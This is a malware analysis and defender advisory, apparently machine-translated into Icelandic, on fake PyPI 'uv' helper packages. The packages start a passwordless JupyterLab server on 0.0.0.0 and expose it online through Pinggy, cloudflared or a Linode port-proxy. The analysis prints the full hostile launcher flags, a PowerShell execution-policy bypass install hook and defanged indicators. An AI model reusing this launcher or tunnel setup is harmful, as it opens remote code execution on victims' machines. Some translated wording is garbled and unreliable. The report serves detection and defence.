FauxUV: Falskar PyPI uv pakkar opna Jupyter fyrir vefinn

FauxUV: falsa PyPI UV hjálparforrit sem opna óstaðfestan Jupyter netþjón fyrir internetið.

TL; DR

Klasi af PyPI-pakka fékk lánað nafnið uv, hraðvirka og gríðarlega vinsæla Python pakkastjórann sem byggir á Rust, til að þykjast vera UV hjálparar. Þeir bjóða upp á nánast enga raunverulega virkni. Það sem þeir hafa í staðinn er Windows farmur sem stendur upp úr JupyterLab netþjónn með slökkt á auðkenningu og birtir það í síðari útgáfum á almenningi á internetinu í gegnum öfugan göng.

Þetta er öll sagan í einni línu: nafn trausts tóls sem beita og JupyterLab sem vél fyrir fjarstýrða kóðaframkvæmd. Jupyter-þjónn keyrir hvaða kóða sem þú slærð inn í netþjón.ebook reitur; einn sem er ræstur með tómu tákni og bundinn við öll netviðmót er opinn túlkur sem allir sem geta náð í tengið geta keyrt.

Við fylgjumst með klasanum sem FauxUVPakkningarnar tvær sem skoðaðar voru eru moon-uv (0.0.1-0.0.16) og my-magic-uv-helper (0.0.1), birt af sama rekstraraðila og virk á PyPI þegar greiningin fer fram.

VistkerfiPyPI
Pakkarmoon-uv (0.0.1-0.0.16), my-magic-uv-helper (0.0.1)
Markmið vettvangsWindows
KjarnahegðunÓstaðfestur JupyterLab netþjónn, birtur á internetinu í gegnum öfugan göng
Lögmæt verkfæri misnotuðUV, JupyterLab, skýjabloss, Pinggy

Beitingin: nafn sem þú treystir nú þegar

uv er eitt af mest uppsettu Python tólunum síðustu tvö ár, svo „hjálpartæki fyrir uv„er pakki sem forritari setur upp án þess að hugsa sig tvisvar um. FauxUV eyðir trúverðugleika sínum alfarið á því nafni. Pakkarnir vefja um ósvikinn uv uppsetningarforrit frá Astral — vefslóðirnar í gagnagrunninum vísa á raunverulega, virta vefþjónustuaðila — svo fljótt yfirlit sér ekkert nema traustar tilvísanir. Enginn pakkanna bætir í raun við uv virkni; nafnið er öll dulargervi.

JupyterLab sem RCE vélin

Kjarninn í farmnum er ræsibúnaður sem ræsir JupyterLab þegar öll varnargrindur eru fjarlægðar:

jupyter server --with jupyterlab   --ip=0.0.0.0            # listen on every interface   --ServerApp.token=""    # no password, no token   --allow_origin='*'      # accept cross-origin connections   --disable_check_xsrf    # allow a remote browser/WebSocket to drive it

Hver fáni fjarlægir vernd og handritið sem sent er til að skrifa athugasemdir við þær (á upprunalegu kínversku): tóma táknið „slekkur á lykilorðs- og auðkennisathugun — hver sem er getur tengst.“ JupyterLab er lögmæt gagnavísinda-IDE, en ekkiebook Cell keyrir handahófskenndan kóða eftir hönnun. Stillt á þennan hátt og bundið við 0.0.0.0, það hættir að vera IDE og verður óstaðfest fjarstýrð skel á vélinni — engin sérsniðin malware tvíundarskrá þarf, bara almennt tól sem vísar í ranga átt.

Tveir stuðningshlutar gera það aðgengilegt og endurtakanlegt:

  • Kveikja á hljóðlausri uppsetningu. Fyrri útgáfur keyra PowerShell með -Framhjá framkvæmdarstefnu beint frá setup.py on pip uppsetningu, í bakgrunni með villum bældum niður svo Pip lítur eðlilega út. Síðari útgáfur færa sama frumstæðan í pip-uv skipanalínutólið — og slepptu alveg sjálfvirkri keyrslu við uppsetningu.
  • Almennur öfuggöng. Netþjónn á 0.0.0.0 er enn aðeins aðgengilegt gestgjöfum sem geta sent leið til vélarinnar. Innifalin eining opnar [Pinggy](https://pinggy.io/) SSH öfug göng sem áframsendir staðbundna Jupyter tengið á opinbert vistfang og fjarlægir þá takmörkun. Handritið sem sent er inniheldur einnig — athugasemdalaust — aðra leið með Cloudflare. ský blossaði og a netsh port-proxy á Linode IP-tölu, sem skráir sama markmið í gegnum mismunandi innviði.

Samanlagt: settu upp pakkann og Windows-vél keyrir lykilorðslaust JupyterLab og birtir það á opna internetinu.

Hvernig FauxUV þróaðist

Útgáfur FauxUV voru sendar af stað í hröðum skrefum og kveikjupunktur farmsins færðist yfir þær — sem minnir á að ein merkt útgáfa segir sjaldan alla sögu pakkalínu.

Stage útgáfur Trigger Hvað það bætir við
Uppsetningarkrókur moon-uv 0.0.1-0.0.3, my-magic-uv-helper 0.0.1 setup.py við uppsetningu á pip uv uppsetning + PATH undirskrift
CLI-keyrslutími moon-uv 0.0.5-0.0.13 pip-uv stjórn lykilorðslaus JupyterLab ræsirinn
Tunnel moon-uv 0.0.14-0.0.16 pip-uv stjórn virkur Pinggy öfuggöng

Athyglisvert er að sjálfvirka keyrslan á uppsetningartíma var fjarlægð í síðari, öflugri útgáfum — þannig að skanni aðeins stilltur á líftíma hooks myndi gefa nýrri útgáfunum einkunn sem minna áhættusamt, alveg öfugt.

Vísbendingar um málamiðlun

Staðfest með lestri pakkakóðans; endapunktar merktir sagði eru til staðar í skránum en ekki keyrð af greindu útgáfunni. Netvísar eru óvirkir.

Gerð Vísir
Setja upp skipun powershell -ExecutionPolicy Bypass Sæki ósvikna UV uppsetningarforritið, á uppsetningartíma PIP
JupyterLab fánar --ip=0.0.0.0 --ServerApp.token="" --allow_origin='*' --disable_check_xsrf
Öfug göng (virk) free[.]pinggy[.]io:443 áframsending staðbundin 127.0.0.1:8888
Gönggestgjafi (athugasemd) cloudflared tunnel --url hxxp://127[.]0[.]0[.]1:2718
IP (athugasemd) 45[.]79[.]134[.]161 (Linode) í gegnum netsh port-proxy
Þrávirkni kemur fram á undan %USERPROFILE%\.local\bin til notanda PATH

Hegðunarmerki sem vert er að vara sig á, óháð þessum nákvæmu þráðum: a pip uppsetningu sem hrygnir powershell - Framkvæmdastefnu framhjáhlaupi; einhver Júpíter hefja sameiningu tákn = "" með –ip=0.0.0.0; og útleiðandi SSH til *.pinggy.io frá forritara eða CI vél.

Athuguð hegðun og uppruni

Pakkarnir tveir deila höfundi og aðferð: nafni trausts tóls, Windows-hliðun, villuvörn í bakgrunni og trausti á virtum tólum, þannig að fljótleg skoðun sýnir aðeins virtar vefslóðir. Upprunalega kóðinn inniheldur athugasemdir á kínversku sem lýsa öryggistengdum flöggum skýrt; við tilkynnum þær sem sýnilegar fullyrðingar í skránni, ekki sem fullyrðingu um ástæðu. leyfa_uppruni gildi og a samstarf.bat skráarnafnið endurspeglar óformlegu vinnuflæðin „deila staðbundinni keyrslutíma“ sem eru í gangi fyrir Google Colab. Óháð uppruna er pakkaða niðurstaðan sú sama.

Áhrif og leiðbeiningar fyrir varnarmenn

Hverjir verða fyrir gerviútfjólubláum geislum? Windows forritarar og CI keyrslur sem pip uppsetningu einn af þessum pökkum. Lykilorðslaus JupyterLab á 0.0.0.0 er fjarstýrð keyrsla kóða fyrir alla sem geta náð í tengið; göngin fjarlægja takmörkunina á „hverjir geta náð í það“. Þjónninn keyrir sem uppsetningarnotandinn og erfir skrár þess notanda, tákn og skýjaupplýsingar.

Af hverju það er auðvelt að missa af því. Sérhver netstrengur bendir á virta vefþjóna — Astral, JupyterLab, ský blossaði, Pinggy, Colab. Það er engin tvíundarkóði fyrir spilliforrit til að hassa og engin dulbúinn blettur til að afkóða. Mannorðs- og undirskriftarskönnun vanmeta þetta, og þess vegna er hegðunarspurningin — Hvað gerir vélin þegar þessi pakka er sett upp — er sá sem grípur það.

Leiðbeiningar:

  • Meðhöndla hvaða uppsetningartíma sem er powershell - Framkvæmdastefnu framhjáhlaupi sem merki um brot á byggingu, hvaða slóð sem það sækir.
  • Viðvörun á Júpíter sett af stað með tómum tákni og –ip=0.0.0.0; sú samsetning ætti aldrei að birtast á vinnustöð eða hlaupara.
  • Eftirlit með útleiðandi SSH til jarðgangaveitenda (*.pinggy.io, *.trycloudflare.com) úr forritara- og CI-umhverfum.
  • setja uv frá [opinberri heimild](https://docs.astral.sh/uv/) og vera efins um „hjálparpakka“ frá þriðja aðila sem vefja inn tól sem er þegar auðvelt að setja upp.
  • Festa og endurskoða ósjálfstæði við uppfærslu — pakkalína getur aukið möguleika útgáfu fyrir útgáfu.
sca-tools-hugbúnaður-samsetningargreiningartól
Forgangsraðaðu, lagfærðu og tryggðu hugbúnaðaráhættu þína
Fáðu þér ókeypis aðgang.
Ekkert kreditkort krafist.

Tryggðu hugbúnaðarþróun og afhendingu þína

með Xygeni vörupakkanum